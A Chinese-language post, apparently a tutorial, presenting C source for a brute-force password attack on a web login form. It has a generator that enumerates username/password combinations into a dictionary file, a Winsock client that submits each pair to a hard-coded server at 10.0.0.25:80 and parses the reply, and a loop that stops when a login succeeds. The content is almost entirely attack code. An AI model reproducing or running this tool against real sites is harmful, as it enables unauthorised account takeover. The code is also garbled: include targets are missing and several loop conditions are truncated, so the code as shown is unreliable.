基于网页的口令攻击的实现

 1、攻击字典实现（简单实现，在已知口令位数前提下，且限制字典库口令数目）：

#include

#include

#include

#define USERLEN 7

#define PASSLEN 9

#define SIZEOFTABLE 63

static char table[SIZEOFTABLE] = "1234567890QWERTYUIOPqwertyuiopasdfghjklASDFGHJKLmnbvcxzZXCVBNM";

int jinweiadd(int &count)

{

count++;

if(count==SIZEOFTABLE)

{

count = 0;

return 1;

}

return 0;

}

void addcount(int count[16])

{

for(int i = 0;i<16;i++)

{

if(jinweiadd(count[i]) == 0)

break;

}

}

//

void makeone_usps()

{

unsigned test=0;

char userpas[40]={0};

char *qian = "username=";

char *hou = "&password=";

int count[16] = {0};//做计数的数组

FILE *fp;

char *filename = "./字典.txt";

int j=0,t=0;

char user[8];

char pas[10];

int i = 0;

char huiche[2] = {'\r','\n'};

fp = fopen(filename,"wb");

while(1)

{

//chanshengbingchucun

for(j=0;j<7;j++)

{

user[j]=table[count[j]];

}

user[j] = 0;

for(j=8;j<17;j++)

{

pas[j-8]=table[count[j-1]];

}

pas[j-8] = 0;

for(t=0;t<9;t++)

{

userpas[t] = qian[t];

}

for(;t<16;t++)

{

userpas[t] = user[t-9];

}

for(;t<26;t++)

{

userpas[t] = hou[t-16];

}

for(;t<36;t++)

{

userpas[t] = pas[t-26];

}

fwrite(userpas,sizeof(char),35,fp);

fwrite(huiche,sizeof(char),2,fp);

if(count[15]==SIZEOFTABLE-1)

break;

 addcount(count);

 test++;

 if(test==0xfffffff)

 break;

}

fclose(fp);

}

void getone_usps(char usrpas[],unsigned long &count)//count是从零开始的

{

unsigned long i=0;

char mid;

FILE *fp;

char *filename = "./字典.txt";

fp = fopen(filename,"rb");

while(i

{

fread(&mid,sizeof(char),1,fp);

if(mid == '\n')

i++;

}

for(i=0;i<65;i++)

{

usrpas[i]=0;

}

for(i=0;i<65;i++)

{

fread(&mid,sizeof(char),1,fp);

if(mid == '\r')

break;

usrpas[i]=mid;

}

fclose(fp);

count++;

}

2、HTTP协议实现客户端：

#include

#include

#pragma comment(lib,"ws2_32.lib")

int compare(char buffer[])

{

unsigned int i=0x182;

for(;i<1024;i++)

{

if((buffer[i]=='r')&&(buffer[i+1]=='e')&&(buffer[i+2]=='d'))

break;

i++;

}

if(i==1024)

return 1;

i+=8;

unsigned int a=(unsigned int)buffer[i]&0xff;

unsigned int b=(unsigned int)buffer[i+1]&0xff;

if(a==0xb2)

if(b==0xbb)

return 0;

return 1;//代表匹配

}

int testonce(char *usrpas,char ServerIPAddr[],int ServerPort)

{

int flag = -1;

FILE *fp;//,*fp1,*fp2;

int i=0,j=0;

//WSAData 数据结构

WSADATA wsaData;

//客户端套接字句柄

SOCKET ClientSocket;

//服务器地址

SOCKADDR_IN ServerAddr;

//发送数据

char SendData[1024];

fp = fopen("./前奏.txt","rb");

while(!feof(fp))

{

fread(&SendData[i],sizeof(char),1,fp);

i++;

}

i--;

int midsize = strlen(usrpas);

for(j = 0;j

{

SendData[i] = usrpas[j];

i++;

}

SendData[i] = 0;

fclose(fp);

char ReceiveBuffer[1024] = "";

int SendLength = -1;

int Result = -1;

//初始化 Winsock

if((Result = WSAStartup(MAKEWORD(2,2),&wsaData))!=0)

{

printf("WSAStartup 失败！错误代码：%d\n",Result);

return -1;

}

ClientSocket = socket(AF_INET,//协议族

SOCK_STREAM,//流套接字类型

IPPROTO_TCP);//TCP协议

if(ClientSocket<0)

{

printf("socket 失败！错误代码：%d\n",WSAGetLastError());

return -1;

}

memset(&ServerAddr,0,sizeof(ServerAddr));

//填充SOCKADDR_IN

//用来表示服务器的IP和端口

//协议族类型为AF_INET

ServerAddr.sin_family = AF_INET;

//设置服务器端口号

ServerAddr.sin_port = htons(ServerPort);

//设置服务器的IP地址

ServerAddr.sin_addr.s_addr = inet_addr(ServerIPAddr);

//连接服务器

Result = connect(ClientSocket,//套接字句柄

(SOCKADDR*)&ServerAddr,//服务器地址

sizeof(ServerAddr));//地址结构长度

if(Result<0)

{

printf("连接失败！错误代码：%d\n",WSAGetLastError());

return -1;

}

//发送数据

SendLength = send(ClientSocket,//套接字句柄

SendData,//发送数据缓冲区

strlen(SendData),//长度

0);//标志为0

if(SendLength<0)

{

printf("发送失败！错误代码：%d\n",WSAGetLastError());

return -1;

}

//else

//printf("发送数据为：%s\n",SendData);

int ReceiveLen;

//清零

memset(ReceiveBuffer,0,sizeof(ReceiveBuffer));

//接收数据

if((ReceiveLen = recv(ClientSocket,ReceiveBuffer,1024,0))<0)

{

printf("接收失败！错误代码：%d\n",WSAGetLastError());

return -1;

}

else

{

//printf("接收数据为：%s\n",ReceiveBuffer);

if(compare(ReceiveBuffer)==1)

flag=1;

}

if(closesocket(ClientSocket)==SOCKET_ERROR)

{

printf("关闭socket失败错误代码是%d\n",WSAGetLastError());

}

//释放Winsock

if(WSACleanup() == SOCKET_ERROR)

{

printf("释放Winsock失败错误代码是%d\n",WSAGetLastError());

}

return flag;

}

3、三次握手验证口令：

#include "Httptest.h"

#include "dic.h"

#include

int semfile1 = 0;

int semfile2 = 0;

unsigned long count=0;

int threadnum=0;

int numcount=0;

int success = 0;

char result[90];

int threadend=0;

DWORD WINAPI thread(LPVOID ptheread)

{

while(success ==0)

{

system("cls");

if(success !=0)

break;

printf("wait.");

_sleep(250);

system("cls");

if(success !=0)

break;

printf("wait..");

_sleep(250);

system("cls");

if(success !=0)

break;

printf("wait...");

_sleep(250);

system("cls");

if(success !=0)

break;

printf("wait....");

_sleep(250);

}

system("cls");

return 1;

}

void main()

{

char usrpas[65]="";

char ServerIPAddr[50] = "10.0.0.25";

int ServerPort = 80;

unsigned long numofdic=13;

DWORD threadid;

CreateThread(0,0,thread,0,0,&threadid);

while(count

{

getone_usps(usrpas,count);

int flag = testonce(usrpas,ServerIPAddr,ServerPort);

if(flag==1)

{

success = 1;

//printf("成功密码为%s\n",usrpas);

break;

}

}

if(count == numofdic)

success = 2;

_sleep(500);

if(success == 1)

printf("成功密码为%s\n",usrpas);

else

printf("字典库中无合适的用户名密码\n");

return;

}